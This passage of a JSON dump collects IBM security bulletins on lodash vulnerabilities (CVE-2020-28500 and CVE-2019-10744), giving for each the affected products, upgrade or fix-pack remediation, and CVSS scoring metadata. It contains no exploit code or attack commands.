\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nApp Connect Enterprise Certified Container| 1.0.0 with Operator \nApp Connect Enterprise Certified Container| 1.0.1 with Operator \nApp Connect Enterprise Certified Container| 1.0.2 with Operator \nApp Connect Enterprise Certified Container| 1.0.3 with Operator \nApp Connect Enterprise Certified Container| 1.0.4 with Operator \n \n\n\n## Remediation/Fixes\n\nUpgrade to App Connect Enterprise Certified Container to Operator version 1.0.5 (available in CASE 1.0.6) or higher, and ensure that any operand components are upgraded to 11.0.0.10-r2 or higher.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-11-17T12:14:48", "type": "ibm", "title": "Security Bulletin: App Connect Enterprise Certified Container Dashboard is vulnerable to (CVE-2020-15168)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2020-11-17T12:14:48", "id": "743B0C7662E1826545C0F7458FEB6B2C956751FD07D49467FFD3F57A902C54EF", "href": "https://www.ibm.com/support/pages/node/6369151", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-28T01:54:28", "description": "## Summary\n\nIBM Cloud Private is vulnerable to Node.js lodash vulnerabilities\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Private| 3.2.1 CD \nIBM Cloud Private| 3.2.2 CD \n \n\n\n## Remediation/Fixes\n\nProduct defect fixes and security updates are only available for the two most recent Continuous Delivery (CD) update packages \n\n * IBM Cloud Private 3.2.1\n * IBM Cloud Private 3.2.2\n\nFor IBM Cloud Private 3.2.1, apply fix pack:\n\n * [IBM Cloud Private 3.2.1.2105](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.1.2105-build600576-44535&includeSupersedes=0> \"IBM Cloud Private 3.2.1.2105\" )\n\nFor IBM Cloud Private 3.2.2, apply fix pack:\n\n * [IBM Cloud Private 3.2.2.2105](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.2.2105-build600575-44536&includeSupersedes=0> \"IBM Cloud Private 3.2.2.2105\" )\n \n\n\nFor IBM Cloud Private 3.1.0, 3.1.1, 3.1.2, 3.2.0:\n\n * Upgrade to the latest Continuous Delivery (CD) update package, IBM Cloud Private 3.2.2. \n * If required, individual product fixes can be made available between CD update packages for resolution of problems. Contact IBM support for assistance\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-09-03T13:28:55", "type": "ibm", "title": "Security Bulletin: IBM Cloud Private is vulnerable to Node.js lodash vulnerabilities (CVE-2020-28500)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2021-09-03T13:28:55", "id": "53728EF49CBD2D57C5A7DFD396D80D633E1B2698B544552FBD73673F671BDD9A", "href": "https://www.ibm.com/support/pages/node/6486341", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-28T01:56:10", "description": "## Summary\n\nIBM Cloud Transformation Advisor has addressed Node.js vulnerability CVE-2020-28500\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Transformation Advisor| 2.4.2, 2.4.3 \n \n\n\n## Remediation/Fixes\n\nUpgrade to 2.4.4 or later. \n\nIBM Cloud Transformation Advisor can be installed from OperatorHub page in Red Hat OpenShift Container Platform or locally following this [link](<https://www.ibm.com/cloud/architecture/tutorials/install-ibm-transformation-advisor-local> \"link\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-06-22T16:04:43", "type": "ibm", "title": "Security Bulletin: IBM Cloud Transformation Advisor is affected by Node.js vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2021-06-22T16:04:43", "id": "2AB31A2452F1029931921EB5550E825A48628AEC211877653233AD2750800450", "href": "https://www.ibm.com/support/pages/node/6465933", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-28T01:57:19", "description": "## Summary\n\nA security vulnerability in Node.js Lodash module affects IBM Cloud Automation Manager.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Automation Manager| 4.2.0.1 \n \n\n\n## Remediation/Fixes\n\nDownload IBM Cloud Automation Manager 4.2.0.1 iFix 3 from \n[https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=icp-cam-3.2.1-build600412&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-cam-3.2.1-build600412&includeSupersedes=0>)\n\nFollow the instructions in Readme link in [https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=icp-cam-3.2.1-build600412&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-cam-3.2.1-build600412&includeSupersedes=0>) to install the iFix 3 to your IBM Cloud Automation Manager 4.2.0.1.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-05-11T14:44:37", "type": "ibm", "title": "Security Bulletin: A security vulnerability in Node.js Lodash module affects IBM Cloud Automation Manager.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2021-05-11T14:44:37", "id": "478D539053FCDD73C5A8373E16979758B81C985D8E7BF025D07D04F9628EF459", "href": "https://www.ibm.com/support/pages/node/6451593", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-28T01:55:06", "description": "## Summary\n\nA potential vulnerability has been identified related to Node.js lodash module. Refer to details for additional information.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWA for ICP| 1.4.2, 1.5.0 \n \n\n\n## Remediation/Fixes\n\nUpgrade to the latest (4.0.0) release of WA for CP4D which maintains backward compatibility with the versions listed above.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-07-30T21:10:43", "type": "ibm", "title": "Security Bulletin: Potential vulnerability with Node.js lodash module", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2021-07-30T21:10:43", "id": "E7916A39B8F8B202061B3356B641D9B0DF934409579E8BA6EC2F6E7C3BABEB69", "href": "https://www.ibm.com/support/pages/node/6476626", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-28T01:56:14", "description": "## Summary\n\nIBM Cloud Pak for Integration is vulnerable to lodash vulnerability CVE-2020-28500 with details below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nPlatform Navigator in IBM Cloud Pak for Integration (CP4I)| 2020.4.1-0-eus \n2020.4.1-1-eus \n \n \n\n\n## Remediation/Fixes\n\n**Platform Navigator in ****IBM Cloud Pak for Integration**\n\nUpgrade Platform Navigator to 2020.4.1-2-eus using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2020.4?topic=202041-upgrading-platform-navigator-component-deployment-interface>\n\n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-06-18T14:33:50", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Integration is vulnerable to Node.js lodash vulnerability (CVE-2020-28500)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2021-06-18T14:33:50", "id": "F62691A32672AF34E201E6A62FAE9008EDCB052DF3846E1F1D2194C5F194833E", "href": "https://www.ibm.com/support/pages/node/6465181", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-28T01:44:28", "description": "## Summary\n\nLodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nUCV - UrbanCode Velocity| All \n \n\n\n## Remediation/Fixes\n\nupgrade to 2.4.0 or later\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-07-08T19:03:35", "type": "ibm", "title": "Security Bulletin: CVE-2020-28500", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2022-07-08T19:03:35", "id": "0C8E06A8D7C8A317EC9DCB3FC6E82453314622553B78ED06DDB7A31DD15F465E", "href": "https://www.ibm.com/support/pages/node/6602305", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-28T01:57:14", "description": "## Summary\n\nA security vulnerability in Node.js lodash module affects IBM Cloud Pak for Multicloud Management Managed Service.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak for Multicloud Management Infrastructure Management| All \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Cloud Pak for Multicloud Management 2.3 by following the instructions in <https://www.ibm.com/docs/en/cloud-paks/cp-management/2.3.x?topic=installation-upgrade.>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-05-13T19:29:13", "type": "ibm", "title": "Security Bulletin: A security vulnerability in Node.js lodash module affects IBM Cloud Pak for Multicloud Management Managed Service", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2021-05-13T19:29:13", "id": "F98BEC356DD90D730B85A69226BDC5C7E4DC1C091DA534EFB69BE5603DE0F98B", "href": "https://www.ibm.com/support/pages/node/6453073", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-28T01:57:23", "description": "## Summary\n\nIBM Integration Bus &amp; IBM App Connect Enterprise V11 ship with Node.js for which vulnerabilities were reported and have been addressed. Vulnerability details are listed below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM Integration Bus V10.0.0 - V10.0.0.23\n\nIBM App connect Enterprise V11 , V11.0.0.0 - V11.0.0.11\n\n \n\n\n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| APAR| \n\n**Remediation / Fix** \n \n---|---|---|--- \nIBM App Connect Enterprise| V11.0.0.0-V11.0.0.11| IT36322| \n\nThe APAR is available in fix pack 11.0.0.12\n\n[IBM App Connect Enterprise Version V11-Fix Pack 11.0.0.12](<https://www.ibm.com/support/pages/node/6428027> \"IBM App Connect Enterprise Version V11-Fix Pack 11.0.0.12\" ) \n \nIBM Integration Bus | V10.0.0.0 - V10.0.0.23| IT36322| \n\nInterim fix for APAR IT36322 is available from [IBM Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/Integration+Bus&release=10.0.0.23&platform=All&function=aparId&apars=IT36322> \"IBM Fix Central\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-05-05T12:10:14", "type": "ibm", "title": "Security Bulletin: IBM Integration Bus & IBM App Connect Enterprise V11 are affected by vulnerabilities in Node.js (CVE-2020-28500)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2021-05-05T12:10:14", "id": "CE9673C31D0D5A62B7B7DB43DC860904F84A43924D00B12EF5877209E580BA6B", "href": "https://www.ibm.com/support/pages/node/6450000", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-24T05:46:52", "description": "## Summary\n\nVulnerability CVE-2019-10744 found in lodash package.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-10744](<https://vulners.com/cve/CVE-2019-10744>) \n**DESCRIPTION: **Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/167415](<https://exchange.xforce.ibmcloud.com/vulnerabilities/167415>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM PowerAI | 1.5.4 \nIBM PowerAI | 1.6.0 \nWatson Machine Learning Community Edition | 1.6.1 \nWatson Machine Learning Community Edition | 1.6.2 \nWatson Machine Learning Accelerator | 1.1.2 \n \nNote : The product was renamed after the 1.6.0 version.\n\n## Remediation/Fixes\n\n**For IBM PowerAI 1.5.4 and Watson Machine Learning Accelerator 1.1.2:**\n\nDownload fix : [http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+PowerAI&amp;fixids=powerai-security-fix-ppc64le-rhel-1.5.4&amp;source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FIBM+PowerAI&fixids=powerai-security-fix-ppc64le-rhel-1.5.4&source=SAR>)\n\nInstall instructions: <https://www.ibm.com/support/pages/node/1135077>\n\n**For IBM PowerAI 1.6.0 and ****Watson Machine Learning Community Edition**** 1.6.1 :**\n\nUpgrade to WML CE 1.6.2, which includes the fixes. See <https://www.ibm.com/support/knowledgecenter/SS5SF7> for upgrading instructions.\n\n**For ****Watson Machine Learning Community Edition**** 1.6.2 :**\n\n[](<https://github.ibm.com/mldlppc/caffe-squad-docprep/blob/master/1.6.2-ifix.md#installing-from-wml-ce-with-ifix-from-scratch>)**For installing WML CE from scratch**\n\nNew installations of WML CE include all security fixes. See <https://www.ibm.com/support/knowledgecenter/SS5SF7> for installation instructions.\n\n## [](<https://github.ibm.com/mldlppc/caffe-squad-docprep/blob/master/1.6.2-ifix.md#updating-an-existing-wml-ce-installation>)Updating an existing WML CE installation\n\nIt is recommended to keep packages up to date. To update all packages to the latest versions use:\n \n \n conda update --all\n \n\nTo update individual packages, use the package name:\n \n \n conda update tensorboard\n \n\nIf you have previously installed WML CE using the `powerai` meta-package, you can also use that to update to the latest packages.\n \n \n conda update powerai\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-01-22T18:26:38", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in lodash shipped with PowerAI.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2020-01-22T18:26:38", "id": 